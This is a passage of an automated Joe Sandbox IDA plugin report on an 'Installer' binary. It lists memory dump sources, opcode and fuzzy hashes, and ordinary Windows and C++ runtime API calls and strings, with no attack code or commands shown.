                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1096550386-0
                                                                                                                                                                                                                                                    • Opcode ID: fe88f6f49d7b87d8e0eb081137f86ade1fdbe924ddf5b8ab0a4c5481d6a2af39
                                                                                                                                                                                                                                                    • Instruction ID: 6172299867e538aa085fe899b18cad92fa6594332950ad1209703f353bdb9ac8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe88f6f49d7b87d8e0eb081137f86ade1fdbe924ddf5b8ab0a4c5481d6a2af39
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C519372600206AFFB335F60CC81EBB77A9EF44712B160129FD14DA261E770DC5896A0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32(?,0034EFCE,00348E30,00000000,?,00348E30,0034A2F0), ref: 0034F005
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(00348E38), ref: 0034F024
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(00348E38,0034A2F0,?), ref: 0034F052
                                                                                                                                                                                                                                                    • TryAcquireSRWLockExclusive.KERNEL32(00348E38,0034A2F0,?), ref: 0034F0AD
• TryAcquireSRWLockExclusive.KERNEL32(00348E38,0034A2F0,?), ref: 0034F0C4
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: AcquireExclusiveLock$CurrentThread
• String ID:
• API String ID: 66001078-0
• Opcode ID: 831f3a2080b2a02b1e01196c3c6c1edcd90f9abb229f025c1332274603eea853
• Instruction ID: 4ccf6e84d7d5674cd549dabc7dee5913a853d86bef68e60d37643291a249fac1
• Opcode Fuzzy Hash: 831f3a2080b2a02b1e01196c3c6c1edcd90f9abb229f025c1332274603eea853
• Instruction Fuzzy Hash: 23416971900A0ADFCB22CF65C48196AB3F8FF88315B19493AE45ACB942D730F985CF51
APIs
• __EH_prolog3.LIBCMT ref: 0034D4C9
• std::_Lockit::_Lockit.LIBCPMT ref: 0034D4D3
• int.LIBCPMT ref: 0034D4EA
  • Part of subcall function 0034C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0034C1F6
  • Part of subcall function 0034C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0034C210
• codecvt.LIBCPMT ref: 0034D50D
• std::_Lockit::~_Lockit.LIBCPMT ref: 0034D544
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
• String ID:
• API String ID: 3716348337-0
• Opcode ID: 9a0af24da35fea3c6a4595b36f50a662205d8f92fd4dfb0b2c22ba3b0b3f5c3b
• Instruction ID: 83c6d5f233212dcb37e81cfdeece87b04f36d935983d024123c413e184ec365f
• Opcode Fuzzy Hash: 9a0af24da35fea3c6a4595b36f50a662205d8f92fd4dfb0b2c22ba3b0b3f5c3b
• Instruction Fuzzy Hash: A601C0359101159FCB03EBA4C851ABEB7F5AF85324F154449F415AF382CF74AE40CB82
APIs
• __EH_prolog3.LIBCMT ref: 0034ADDE
• std::_Lockit::_Lockit.LIBCPMT ref: 0034ADE9
• std::_Lockit::~_Lockit.LIBCPMT ref: 0034AE57
  • Part of subcall function 0034ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0034ACC2
• std::locale::_Setgloballocale.LIBCPMT ref: 0034AE04
• _Yarn.LIBCPMT ref: 0034AE1A
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
• String ID:
• API String ID: 1088826258-0
• Opcode ID: 517605560d83d3d98971a67c9be9f49fd70871c3ce7b8fff54db95b9c48f5c61
• Instruction ID: b29d7a1bac269038ff5477155cc6e9caea13dcbfec2a1d49aa8f0a3df82f037d
• Opcode Fuzzy Hash: 517605560d83d3d98971a67c9be9f49fd70871c3ce7b8fff54db95b9c48f5c61
• Instruction Fuzzy Hash: E401B175A40A609FCB07EB20D89157D77A5FF84750B054009E9155F381CF347E82CF82
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: _strlen
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 4218353326-1866435925
• Opcode ID: d4a94234ed542104b119ea23f373db50e851b77d5e07e24ec0e111e51fadfaba
• Instruction ID: b625be1e48f712ee84b018ff9c3f3d4fb87f9ac7a8671f9ac160f1f809bd0e52
• Opcode Fuzzy Hash: d4a94234ed542104b119ea23f373db50e851b77d5e07e24ec0e111e51fadfaba
• Instruction Fuzzy Hash: 35F15D75A006148FCB15CF68C494BADBBF1FF89324F198269E819AF3A1D734AD45CB90
APIs
  • Part of subcall function 0035C16A: GetLastError.KERNEL32(00000000,?,0035E58D), ref: 0035C16E
  • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00358363), ref: 0035C210
• GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00355BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00360A35
• IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00355BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00360A6C
Strings
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: ErrorLast$CodePageValid
• String ID: ,K7$utf8
• API String ID: 943130320-3027620799
• Opcode ID: 364663e3bf439ebd8ed9532e078ba704acacb530d119c86ec52f32c44565b43b
• Instruction ID: c0cd88bb7ff1007600d4696f1561263a77868e585bb3e41d1320a999012385cc
• Opcode Fuzzy Hash: 364663e3bf439ebd8ed9532e078ba704acacb530d119c86ec52f32c44565b43b
• Instruction Fuzzy Hash: 2651E531600705AADB2FAB71CC43FAB73A8EF05744F15C429F9499B189E6B0D9808765
APIs
                                                                                                                                                                                                                                                    • Concurrency::details::_Release_chore.LIBCPMT ref: 00347526
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00347561
                                                                                                                                                                                                                                                      • Part of subcall function 0034AF37: CreateThreadpoolWork.KERNEL32(0034B060,00348A2A,00000000,00000000,?,00348A2A,?,?,?,?), ref: 0034AF46
                                                                                                                                                                                                                                                      • Part of subcall function 0034AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 0034AF53
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: Fail to schedule the chore!$G.7
                                                                                                                                                                                                                                                    • API String ID: 3683891980-1612208290
                                                                                                                                                                                                                                                    • Opcode ID: ef3d93b19ab1d66eb08a283490649681ac8aa1e03dd7f23f37ae23b901a2e7a2
                                                                                                                                                                                                                                                    • Instruction ID: 056a8f148b1f63c92e0514928a930f5c99aa6edca77681cee2ed8d76ffa40bc0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef3d93b19ab1d66eb08a283490649681ac8aa1e03dd7f23f37ae23b901a2e7a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC519CB4D006089FCB16DF94D845BAEBBB4FF08314F144129E8196F391D779A905CF91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00343EC6
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00344002
                                                                                                                                                                                                                                                      • Part of subcall function 0034ABC5: _Yarn.LIBCPMT ref: 0034ABE5
                                                                                                                                                                                                                                                      • Part of subcall function 0034ABC5: _Yarn.LIBCPMT ref: 0034AC09
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name$|=4e.7
                                                                                                                                                                                                                                                    • API String ID: 2070049627-3792104845
                                                                                                                                                                                                                                                    • Opcode ID: 54189e90262ab288d726db517285de6ced36919f9c32965e93c7bd52b2d7ce98
                                                                                                                                                                                                                                                    • Instruction ID: 2ba9a789b8662a8e77c03fe82fbecd0ec8d3ba9ce8eae77c3f224b508da4fe3d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54189e90262ab288d726db517285de6ced36919f9c32965e93c7bd52b2d7ce98
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD417BF0A007459BEB21DF69C805B17BAF8BF04714F044629E8099B780E37AF518CBE2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 0034B809
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: 3eb40265c8aaa33d8b3e23a23219dee5667495491bdde574b243586a1f46b578
                                                                                                                                                                                                                                                    • Instruction ID: 374655116d5518c8cb36017f723b649600ff578787a6511e6eab3d70465aaae2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3eb40265c8aaa33d8b3e23a23219dee5667495491bdde574b243586a1f46b578
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A721C235900645DFCF2A9FA4C855B6AF7ECEF44720F15491EE4528FA90DB34FA40CA81
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0034253A,?,?,00000000), ref: 0034F129
                                                                                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(?,00000000,?,?,0034253A,?,?,00000000), ref: 0034F142
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,0034253A,?,?,00000000), ref: 0034F154
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCodeExitHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                    • String ID: :%4
                                                                                                                                                                                                                                                    • API String ID: 2551024706-536517894
                                                                                                                                                                                                                                                    • Opcode ID: d8fc0012224287f642e12f76df90227dd7af092b7e17a4e2324ffb6a1e26ceb9
• Instruction ID: 70fb550f3eebbadec9955b57b44badbee9eb634750623cca7413cc4fc69d874e
• Opcode Fuzzy Hash: d8fc0012224287f642e12f76df90227dd7af092b7e17a4e2324ffb6a1e26ceb9
• Instruction Fuzzy Hash: 2DF01971654515EFEF224F74DC06A593BA8EB01774F294320F925DA1F0D731EE41D640
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: Yarn
• String ID: e.7$|=4e.7
• API String ID: 1767336200-2368979467
• Opcode ID: 7b452cb5f8d520daf717b14655729da7eabdee84d1d684a734047d1303c7cc24
• Instruction ID: 44f2447bf6be94e9143ad255e89d24792c4c1e7df186b6457336445f75e3abbc
• Opcode Fuzzy Hash: 7b452cb5f8d520daf717b14655729da7eabdee84d1d684a734047d1303c7cc24
• Instruction Fuzzy Hash: 9EE03922348600ABEB5AAA65AC92FA633D8CB04B61F10402EF95ECE5D1ED10BC044655
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,003669DC,00000000,?,0037D2B0,?,?,?,00366913,00000004,InitializeCriticalSectionEx,00370D34,00370D3C), ref: 0036694D
• GetLastError.KERNEL32(?,003669DC,00000000,?,0037D2B0,?,?,?,00366913,00000004,InitializeCriticalSectionEx,00370D34,00370D3C,00000000,?,0035BBBC), ref: 00366957
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0036697F
Strings
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
• Opcode ID: ab3efbee9ad8ceb15b24486c7ce8ec84107bda8e8e0899f93cdccbf66036687f
• Instruction ID: 2524c733d31c54e83a808d7849c54db12ab7032f6ec446441b202b169a8b1850
• Opcode Fuzzy Hash: ab3efbee9ad8ceb15b24486c7ce8ec84107bda8e8e0899f93cdccbf66036687f
• Instruction Fuzzy Hash: 70E0E570394604BBEA321AA0EC07B697A99AB40B91F148824FE4DA84A5DB71A8909944
APIs
• GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00364001
  • Part of subcall function 0035C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0035D895,?,00000000,-00000008), ref: 0035C082
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00364253
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00364299
• GetLastError.KERNEL32 ref: 0036433C
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
• Opcode ID: 3fa22f765355732dbc876b83f4dfb168d492ebe96ae22b6654dba01a81c8bd8a
• Instruction ID: 30de5b26e917c8ba0e45ee205cf9d6c1bf888312123a05027bdebc4488c3a53b
• Opcode Fuzzy Hash: 3fa22f765355732dbc876b83f4dfb168d492ebe96ae22b6654dba01a81c8bd8a
• Instruction Fuzzy Hash: 95D17975D002589FCF16CFE8D8809EDBBB9FF09314F28852AE956EB355D630A941CB60
APIs
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
• Opcode ID: 10ae7351e237bb6ec54e322e5a05a7e79e01e32540909620287f8b0dd4a2ff07
• Instruction ID: d248e9e7be1272d6a9ddbd816c5a671e496046bae4783e8e034321f0c9429c82
• Opcode Fuzzy Hash: 10ae7351e237bb6ec54e322e5a05a7e79e01e32540909620287f8b0dd4a2ff07
• Instruction Fuzzy Hash: 1851E3796006059FDB2B9F50C882FAAF7A4EF04712F15452DEC466A2B1D731ED88CB90
APIs
• GetCurrentThreadId.KERNEL32 ref: 003472C5
• std::_Throw_Cpp_error.LIBCPMT ref: 00347395
• std::_Throw_Cpp_error.LIBCPMT ref: 003473A3
• std::_Throw_Cpp_error.LIBCPMT ref: 003473B1
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$CurrentThread
• String ID:
• API String ID: 2261580123-0
• Opcode ID: 0a0724cb2bcc2cb005b20a0bc0532c92612577da9d573906679323a01a4e99cf
• Instruction ID: 17b88929fa81679bba1cb67cd21e432eff9166c0050404f0a018cc46265c00cf
• Opcode Fuzzy Hash: 0a0724cb2bcc2cb005b20a0bc0532c92612577da9d573906679323a01a4e99cf
• Instruction Fuzzy Hash: 4941D2B59047058BDB22EF64C941BAAB7E8FF44320F158639E8165F691EB34F814CBE1
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00344495
• std::_Lockit::_Lockit.LIBCPMT ref: 003444B2
• std::_Lockit::~_Lockit.LIBCPMT ref: 003444D3
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00344580
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID:
